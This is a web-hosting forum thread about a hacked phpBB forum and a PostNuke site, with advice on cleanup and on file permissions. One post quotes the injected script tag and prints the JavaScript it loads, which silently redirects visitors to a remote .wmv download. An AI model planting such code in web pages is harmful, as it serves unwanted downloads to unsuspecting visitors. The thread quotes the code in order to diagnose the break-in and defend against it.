possible forum hijack

[ComandoSupremo]

Hello,

I have had a few repor5ts from forum members at www.comandosupremo.com/forum of a media file named update2.wmv popping up on the forum for download. The media file would also show a picture of elephant. I have never put this file in the forum and I believe it may be some type of virus or trojan.

I have also noticed my tropic_anywhere.php no longer works on www.comandosupremo.com. This seemed to quit working around teh same time the forum experienced trouble.

Here is the code for the javascript:
<script language="JavaScript" type="text/javascript" src="http://www.comandosupremo.com/forum/topics_anywhere.php?mode=show&f=a&n=5&r=y&b=squ&lp b=0&lpd=0&lpi=y"></script

Any help would be most appreciated!

Jim

[Mirzabah]

I can confirm that when I visited your site, it tried to download a file called update2.wmv - without me asking for it. This only happened the first time - subsequent re-loads didn't do anything out of the ordinarey . If you haven't already done so, I would strongly recommend changing your FTP and MySQL passwords and upgrading to the latest version of phpBB.

[satis]

I got it too. at the top of the main forum page is this line

PHP Code:

<script language='JavaScript' type='text/javascript' src='http://domainstat.net/stat.php'></script> 


I pulled up that page, which shows the following

PHP Code:

<!--
    var currentDate = new Date();
    var adRecurrence = "daily";
    var adId = "a1087804322";
    var adExpiration = 0;
    var retry=2;
    var flag = 0;
    var obj=null;
        currentDate.setTime(currentDate.getTime() + (1*36*60*60*1000));
        adExpiration = currentDate.toGMTString();
    function SetCookie(sName, sValue, sExpire){
        var expireCode = "";
        if (sExpire) { expireCode =  "expires=" + sExpire + ";" }
        document.cookie = sName + "=" + escape(sValue) + ";" + expireCode
    }


    function GetCookie(sName) {
        var aCookie = document.cookie.split("; ");
        for (var i=0; i < aCookie.length; i++) {
            var aCrumb = aCookie[i].split("=");
            if (sName == aCrumb[0]) { return unescape(aCrumb[1]); }
        }
        return null;
    }

    function upop() {
          setTimeout("location.href = 'http://www.dlfree.com/Update2.wmv'",1000);
    }


    if (!GetCookie(adId)) {
        SetCookie(adId,"1", adExpiration);
                                setTimeout("upop()",10*1000);

    }
//--> 


obviously that's the source of the popup. The question is, is this something you added to your forum? If so...just un-add it and you'll probably be fine. If not, then at least one of your forum files has been edited, which is typically a BAD sign. If someone was able to alter one of your files, there's no telling what else they might have done. At a minimum, check your user list and make sure there aren't any new admins you don't know about, and change your password.

I have likewise been hijacked at http://stringersystems.com This is a PostNuke site using Xanthia themes.

I found that all the files in the active theme folder had been touched on 23Nov05 and the script appended.

[satis]

ah, the files were appended? If that's the case, I'd consider your forum, site, and database compromised. I would highly recommend you audit your user tables, as well as upgrade to the latest release of your forum and/or postnuke versions. Not a happy occurence, I'm sure, but I've been through a similar procedure and it's not horribly complex. Much better than not knowing if someone else owns your website now. Be sure to change all your login information for anything that matters.

[linnetwoods]

Is there some sort of script that one can use to check for changes just before making any oneself, to see if someone else has done so? i.e. After you finished making changes on your site, you would run the script to update it, so it knew what should be there. It would tell you what changes it had found and you would OK them. Then, before making the next set of changes, you woud run the script again, to see whether it reported any changes that had been made (by someone else, obviously) since your last session. At that point you would need the option to see the changes and maybe even get some info on how hey got there and the option to undo all changes made since the last official update... Does it exist? Could it be created by someone who understands these mysteries that escape us ordinary web-manglers?

[IanS]

A bit like the md5 system (now defunct) for passing ISO images. The problem I see with this is that although the scripts won't change, with blogs and other dynamic data around the hash totals would also change unless you could specify the files to include (or exclude).

[satis]

you could do it with md5. MD5 still works, it's just 'hackable'. For something like a checksum hash I'm sure it'd still be useful.

You could probably set up a php page with cron job...have it fopen all the files, stuff all the contents into an md5, then store the hash somewhere (like a db table or a flat file). Actually, a db table would be great...one row per day per file or something. Then have it compare the previous day's hashes with the current days and raise a warning if they're difference.

As long as you're doing it on the static background php pages (and not cached templates or anything truly dynamic) that'd be a great way to do it. Good idea IanS. Now to trick Extras or someone into coding it. hehe.

[extras]

Quote:

Originally Posted by satis

Now to trick Extras or someone into coding it. hehe.

I will not write something like that.
It's not effective.

I mean, it only tries to detect already cracked situation, and it's too late.
Also, it's going to be extremely heavy, some people will abuse it and harm everyone.

It's better to detect, bad permission setting (666, 777, ...),
unsafe scripts, and other vulnerabilities BEFORE being cracked.

But I don't think I will write that either, as it's going to be a heavy script
(although not as heavy as checking md5 or CRC), and people who needs them
will abuse the script, most probably.


The real problem is, let's say, the lack of education.
Constructing safe site is easy.

The ten commandments for safer web site (for PowWeb users)

Quote:

1. Use safer permission setting of 710 instead of 755 for all directories.
2. Use even safer permission of 700 for directories not directly accessed by Apache.
3. Use 750 only for directories you want to use Apache's default directory listing.

4. Use safer permission of 600 instead of 640 for ALL PHP scripts.
5. Use safer permission of 700 instead of 755 for ALL CGI scripts.

6. Password protect ALL scripts other than you want general public to access,
including webstats provided by PowWeb.

7. Avoid using unsafe scripts: Matt's Formmail.pl, phpBB2, php-Nuke,
and many other PHP and CGI scripts. I guess 90% of cracking happens this way.

Remember that PHP is a vulnerable, buggy, and risky languages
and scripts written with it are often very vulnerable, buggy and risky.

Static contents require much less maintenance and a lot safer,
and can be as cool as stupid CMS/BLOG construction.

8. Check the IP of last access for OPS, FTP, and mail, regularly.
9. Check your raw log to see suspicious access and cracking attempts.

10. Keep your PC safe. If your PC is compromised, bad people can obtain
access to your site and many many personal information.

DO NOT trust BIG corporation, like MS, SONY, and so on.
These guys often create stupid products, but they can be clever in deceiving naive users.

Stay away from hyped, fancy, needless, or heavy features.
Stay away from IE/OE, html mail, Javascript, and so on.

Now, I think what we need is something to replace PHP and its badly written apps.
PHP is a cancer of shared hosting in terms of security and resource usage.
(On dedicated server or VPS, it's not as bad.)

Some PHP users are dreaming that Ruby on Rails will be the savior, but I don't think so.
It's still too heavy and apps will be written by same PHP coders who have been
writing unsafe inefficient scripts that the end result will be similar.

I've experimented OCaml and found it pretty fast and small.
And I will write replacement Form mailer and simple CMS with it, probably.


The main problem is the ignorance, again.
People are not aware of how much they are suffering from bad hype around PHP,
just like they are suffering from unsafe MS products such as IE/OE.

And I don't foresee any change in this area very soon, unfortunately.
I've been telling this many times in this forum.
Yet most people are still using unsafe permission and vulnerable scripts without protection.
It's nearly "normal" and inevitable to get cracked.

[linnetwoods]

I know nothing about anything but I came to the conclusion (borne out by a quick glance at the proportion of threads with problems on php on this very forum!) that I should forget trying to use php or MySQL and stick with the simplicity of html, when building some shops for a client. He is really pleased with the results, everything works and the shops are unique instead of being very much like a zillion others. We used PayPal as they have now decided that people can pay by credit card without having to join.

I can see that for a forum or chat room there is probably no alternative but shops and galleries can be made in html without too much slog and they aren't bug-ridden.

[extras]

I wrote a small script that checks unsafe permission, and correct them.

To use, install extratools.php (automatic installer)
http://check-these.info/tools/extratools_php.txt

Then, click on "Install/Update 666.cgi".
When installation is finished, click on the link "666.cgi" or "Run 666.cgi".

This will prevent at least simple cracking done via directory with unsafe permission,
like some people in this thread have suffered.

Note:
If you have a site with lots of files, it may timeout.
It's a slow script, and it won't cause resource abuse, AFAIK.